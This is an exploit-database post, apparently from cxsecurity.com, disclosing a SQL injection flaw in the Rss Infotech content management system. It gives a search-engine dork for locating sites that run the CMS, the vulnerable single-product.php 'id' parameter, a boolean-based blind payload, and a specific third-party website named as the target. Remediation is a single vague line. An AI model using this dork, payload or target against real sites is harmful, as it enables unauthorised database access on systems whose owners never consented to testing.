Rss Infotech cms Sql Injection vulnerability

2018.03.31
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Exploit Title ; Rss Infotech cms Sql Injection vulnerability [+] Date : 2018-03-31 [+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS [+] Vendor Homepage : https://www.rssindia.com.com/ [+] Dork : intext:"Designed by Rss Infotech Pvt.Ltd." inurl:id= [+] Forum : irethicalhackers.com/forums [+] Tested On : windows 10 - kali linux 2.0 [+] Contact : https://telegram.me/WebServer [+] Description : [!] Rss Infotech is a personal content management [+] Poc : [+] Security Level : [!] Medium [+] Exploitation Technique: [!] Remote [+] Request Method : [!] GET [+] Vulnerability Files : [!] single-product.php [+] web application technology: Apache [+] back-end DBMS: MySQL [+] Parameter: id (GET) [!] Type: boolean-based blind [!] Title: AND boolean-based blind - WHERE or HAVING clause [!] Payload: id=1 AND 6987=6987 [+] Target : [!] http://muscledoctor.us/single-product.php?id=111 [+] Fix : [!] Restrict user input or replace bad characters [+] We Are : [+] 0P3N3R [+] Mehrdad_Ice [+] S0!hp


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top